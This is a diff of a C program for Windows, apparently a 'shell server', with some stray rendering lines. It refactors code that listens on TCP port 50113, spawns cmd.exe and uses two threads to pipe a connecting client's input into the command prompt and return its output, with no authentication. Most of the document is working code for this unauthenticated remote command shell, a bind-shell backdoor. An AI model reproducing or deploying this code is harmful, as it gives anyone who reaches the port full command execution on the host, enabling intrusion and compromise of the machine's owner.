|
|
|
@ -4,75 +4,44 @@
|
|
|
|
|
#define DEFAULT_PORT "50113"
|
|
|
|
|
#define DEFAULT_BUFLEN 512
|
|
|
|
|
|
|
|
|
|
// Handles for child process STDIN and STDOUT
|
|
|
|
|
HANDLE g_hChildStd_IN_Rd = NULL;
|
|
|
|
|
HANDLE g_hChildStd_IN_Wr = NULL;
|
|
|
|
|
HANDLE g_hChildStd_OUT_Rd = NULL;
|
|
|
|
|
HANDLE g_hChildStd_OUT_Wr = NULL;
|
|
|
|
|
typedef struct PipeThreadInfo_t {
|
|
|
|
|
HANDLE Pipe;
|
|
|
|
|
SOCKET ClientSocket;
|
|
|
|
|
} PipeThreadInfo;
|
|
|
|
|
|
|
|
|
|
SOCKET ClientSocket = INVALID_SOCKET;
|
|
|
|
|
|
|
|
|
|
//HANDLE g_hInputFile = NULL;
|
|
|
|
|
void CreateChildProcess(HANDLE g_hChildStd_IN_Rd, HANDLE g_hChildStd_OUT_Wr);
|
|
|
|
|
DWORD WINAPI WriteToPipe(LPVOID lpParam);
|
|
|
|
|
DWORD WINAPI ReadFromPipe(LPVOID lpParam);
|
|
|
|
|
void ErrorExit(PCTSTR);
|
|
|
|
|
|
|
|
|
|
void StartShellServer() {
|
|
|
|
|
printf("\n->Start of shell server execution.\n");
|
|
|
|
|
|
|
|
|
|
CreatePipes();
|
|
|
|
|
CreateSocket();
|
|
|
|
|
|
|
|
|
|
// Create the child process.
|
|
|
|
|
CreateChildProcess();
|
|
|
|
|
|
|
|
|
|
// TODO: split into threads
|
|
|
|
|
WriteToPipe();
|
|
|
|
|
// Read from pipe that is the standard output for child process.
|
|
|
|
|
ReadFromPipe();
|
|
|
|
|
|
|
|
|
|
printf("\n->End of shell server execution.\n");
|
|
|
|
|
|
|
|
|
|
// The remaining open handles are cleaned up when this process terminates.
|
|
|
|
|
// To avoid resource leaks in a larger application, close handles explicitly.
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
void CreatePipes() {
|
|
|
|
|
SECURITY_ATTRIBUTES saAttr;
|
|
|
|
|
|
|
|
|
|
// Set the bInheritHandle flag so pipe handles are inherited.
|
|
|
|
|
|
|
|
|
|
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
|
|
|
|
|
saAttr.bInheritHandle = TRUE;
|
|
|
|
|
saAttr.lpSecurityDescriptor = NULL;
|
|
|
|
|
|
|
|
|
|
// Create a pipe for the child process's STDOUT.
|
|
|
|
|
|
|
|
|
|
if (!CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0))
|
|
|
|
|
ErrorExit(TEXT("StdoutRd CreatePipe"));
|
|
|
|
|
|
|
|
|
|
// Ensure the read handle to the pipe for STDOUT is not inherited.
|
|
|
|
|
|
|
|
|
|
if (!SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0))
|
|
|
|
|
ErrorExit(TEXT("Stdout SetHandleInformation"));
|
|
|
|
|
|
|
|
|
|
// Create a pipe for the child process's STDIN.
|
|
|
|
|
|
|
|
|
|
if (!CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0))
|
|
|
|
|
ErrorExit(TEXT("Stdin CreatePipe"));
|
|
|
|
|
|
|
|
|
|
// Ensure the write handle to the pipe for STDIN is not inherited.
|
|
|
|
|
|
|
|
|
|
if (!SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0))
|
|
|
|
|
ErrorExit(TEXT("Stdin SetHandleInformation"));
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
// TODO: to review
|
|
|
|
|
void CreateSocket() {
|
|
|
|
|
/*
|
|
|
|
|
* Server variables
|
|
|
|
|
*/
|
|
|
|
|
WSADATA wsaData;
|
|
|
|
|
struct addrinfo* result = NULL, * ptr = NULL, hints;
|
|
|
|
|
SOCKET ListenSocket = INVALID_SOCKET;
|
|
|
|
|
|
|
|
|
|
int iResult;
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* Client variables
|
|
|
|
|
*/
|
|
|
|
|
SOCKET ClientSocket = INVALID_SOCKET;
|
|
|
|
|
// Pipe handles for child STDIN/STDOUT
|
|
|
|
|
HANDLE g_hChildStd_IN_Rd = NULL;
|
|
|
|
|
HANDLE g_hChildStd_IN_Wr = NULL;
|
|
|
|
|
HANDLE g_hChildStd_OUT_Rd = NULL;
|
|
|
|
|
HANDLE g_hChildStd_OUT_Wr = NULL;
|
|
|
|
|
|
|
|
|
|
SECURITY_ATTRIBUTES saAttr;
|
|
|
|
|
HANDLE PipeThreads[2];
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* Initialize listening socket
|
|
|
|
|
*/
|
|
|
|
|
|
|
|
|
|
// Initialize Winsock
|
|
|
|
|
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
|
|
|
|
|
if (iResult != 0) {
|
|
|
|
@ -125,6 +94,39 @@ void CreateSocket() {
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* Initialize pipes
|
|
|
|
|
*/
|
|
|
|
|
// Set the bInheritHandle flag so pipe handles are inherited.
|
|
|
|
|
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
|
|
|
|
|
saAttr.bInheritHandle = TRUE;
|
|
|
|
|
saAttr.lpSecurityDescriptor = NULL;
|
|
|
|
|
|
|
|
|
|
// Create a pipe for the child process's STDOUT.
|
|
|
|
|
if (!CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0))
|
|
|
|
|
ErrorExit(TEXT("StdoutRd CreatePipe"));
|
|
|
|
|
|
|
|
|
|
// Ensure the read handle to the pipe for STDOUT is not inherited.
|
|
|
|
|
if (!SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0))
|
|
|
|
|
ErrorExit(TEXT("Stdout SetHandleInformation"));
|
|
|
|
|
|
|
|
|
|
// Create a pipe for the child process's STDIN.
|
|
|
|
|
if (!CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0))
|
|
|
|
|
ErrorExit(TEXT("Stdin CreatePipe"));
|
|
|
|
|
|
|
|
|
|
// Ensure the write handle to the pipe for STDIN is not inherited.
|
|
|
|
|
if (!SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0))
|
|
|
|
|
ErrorExit(TEXT("Stdin SetHandleInformation"));
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* Create child process
|
|
|
|
|
*/
|
|
|
|
|
CreateChildProcess(g_hChildStd_IN_Rd, g_hChildStd_OUT_Wr);
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* Process client connection
|
|
|
|
|
*/
|
|
|
|
|
|
|
|
|
|
// Accepting a connection
|
|
|
|
|
ClientSocket = INVALID_SOCKET;
|
|
|
|
|
|
|
|
|
@ -136,11 +138,24 @@ void CreateSocket() {
|
|
|
|
|
WSACleanup();
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
// No longer needed
|
|
|
|
|
|
|
|
|
|
PipeThreadInfo WriteThreadInfo = { g_hChildStd_IN_Wr, ClientSocket };
|
|
|
|
|
PipeThreadInfo ReadThreadInfo = { g_hChildStd_OUT_Rd, ClientSocket };
|
|
|
|
|
PipeThreads[0] = CreateThread(NULL, 0, WriteToPipe, &WriteThreadInfo, 0, NULL);
|
|
|
|
|
PipeThreads[1] = CreateThread(NULL, 0, ReadFromPipe, &ReadThreadInfo, 0, NULL);
|
|
|
|
|
|
|
|
|
|
WaitForMultipleObjects(2, PipeThreads, TRUE, INFINITE);
|
|
|
|
|
|
|
|
|
|
printf("\n->Client disconnected.\n");
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* Finalization
|
|
|
|
|
*/
|
|
|
|
|
// TODO: properly close all handles
|
|
|
|
|
closesocket(ListenSocket);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
void CreateChildProcess()
|
|
|
|
|
void CreateChildProcess(HANDLE g_hChildStd_IN_Rd, HANDLE g_hChildStd_OUT_Wr)
|
|
|
|
|
// Create a child process that uses the previously created pipes for STDIN and STDOUT.
|
|
|
|
|
{
|
|
|
|
|
TCHAR szCmdline[] = TEXT("C:\\Windows\\System32\\cmd.exe");
|
|
|
|
@ -195,36 +210,25 @@ void CreateChildProcess()
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
void WriteToPipe(void)
|
|
|
|
|
|
|
|
|
|
// Read from a file and write its contents to the pipe for the child's STDIN.
|
|
|
|
|
// Stop when there is no more data.
|
|
|
|
|
DWORD WINAPI WriteToPipe(LPVOID lpParam)
|
|
|
|
|
{
|
|
|
|
|
DWORD dwRead, dwWritten;
|
|
|
|
|
//CHAR chBuf[BUFSIZE] = "dir\r\n";
|
|
|
|
|
BOOL bSuccess = FALSE;
|
|
|
|
|
int i = 0;
|
|
|
|
|
|
|
|
|
|
SOCKET ClientSocket = ((PipeThreadInfo*)lpParam)->ClientSocket;
|
|
|
|
|
HANDLE g_hChildStd_IN_Wr = ((PipeThreadInfo*)lpParam)->Pipe;
|
|
|
|
|
|
|
|
|
|
char recvbuf[DEFAULT_BUFLEN];
|
|
|
|
|
int iResult, iSendResult;
|
|
|
|
|
int recvbuflen = DEFAULT_BUFLEN;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
do
|
|
|
|
|
{
|
|
|
|
|
iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);
|
|
|
|
|
if (iResult > 0) {
|
|
|
|
|
printf("Bytes received: %d\n", iResult);
|
|
|
|
|
|
|
|
|
|
// Echo the buffer back to the sender
|
|
|
|
|
iSendResult = send(ClientSocket, recvbuf, iResult, 0);
|
|
|
|
|
if (iSendResult == SOCKET_ERROR) {
|
|
|
|
|
printf("send failed: %d\n", WSAGetLastError());
|
|
|
|
|
closesocket(ClientSocket);
|
|
|
|
|
WSACleanup();
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
printf("Bytes sent: %d\n", iSendResult);
|
|
|
|
|
bSuccess = WriteFile(g_hChildStd_IN_Wr, recvbuf, iResult, &dwWritten, NULL);
|
|
|
|
|
if (!bSuccess) break;
|
|
|
|
|
}
|
|
|
|
|
else if (iResult == 0)
|
|
|
|
|
printf("Connection closing...\n");
|
|
|
|
@ -234,33 +238,21 @@ void WriteToPipe(void)
|
|
|
|
|
WSACleanup();
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
//dwRead = strlen(chBuf) + 1;
|
|
|
|
|
bSuccess = WriteFile(g_hChildStd_IN_Wr, recvbuf, iResult, &dwWritten, NULL);
|
|
|
|
|
if (!bSuccess) break;
|
|
|
|
|
//break;
|
|
|
|
|
//dwRead = strlen(chBuf) + 1;
|
|
|
|
|
//bSuccess = WriteFile(g_hChildStd_IN_Wr, chBuf, dwRead, &dwWritten, NULL);
|
|
|
|
|
//if (!bSuccess) break;
|
|
|
|
|
ReadFromPipe();
|
|
|
|
|
} while (iResult > 0);
|
|
|
|
|
|
|
|
|
|
// Close the pipe handle so the child process stops reading.
|
|
|
|
|
|
|
|
|
|
// Closing STDIN => cmd.exe exit
|
|
|
|
|
if (!CloseHandle(g_hChildStd_IN_Wr))
|
|
|
|
|
ErrorExit(TEXT("StdInWr CloseHandle"));
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
void ReadFromPipe(void)
|
|
|
|
|
|
|
|
|
|
// Read output from the child process's pipe for STDOUT
|
|
|
|
|
// and write to the parent process's pipe for STDOUT.
|
|
|
|
|
// Stop when there is no more data.
|
|
|
|
|
DWORD WINAPI ReadFromPipe(LPVOID lpParam)
|
|
|
|
|
{
|
|
|
|
|
DWORD dwRead, dwWritten;
|
|
|
|
|
CHAR chBuf[BUFSIZE];
|
|
|
|
|
BOOL bSuccess = FALSE;
|
|
|
|
|
HANDLE hParentStdOut = GetStdHandle(STD_OUTPUT_HANDLE);
|
|
|
|
|
SOCKET ClientSocket = ((PipeThreadInfo*)lpParam)->ClientSocket;
|
|
|
|
|
HANDLE g_hChildStd_OUT_Rd = ((PipeThreadInfo*)lpParam)->Pipe;
|
|
|
|
|
|
|
|
|
|
int iSendResult;
|
|
|
|
|
|
|
|
|
@ -280,7 +272,6 @@ void ReadFromPipe(void)
|
|
|
|
|
bSuccess = WriteFile(hParentStdOut, chBuf,
|
|
|
|
|
dwRead, &dwWritten, NULL);
|
|
|
|
|
if (!bSuccess) break;
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|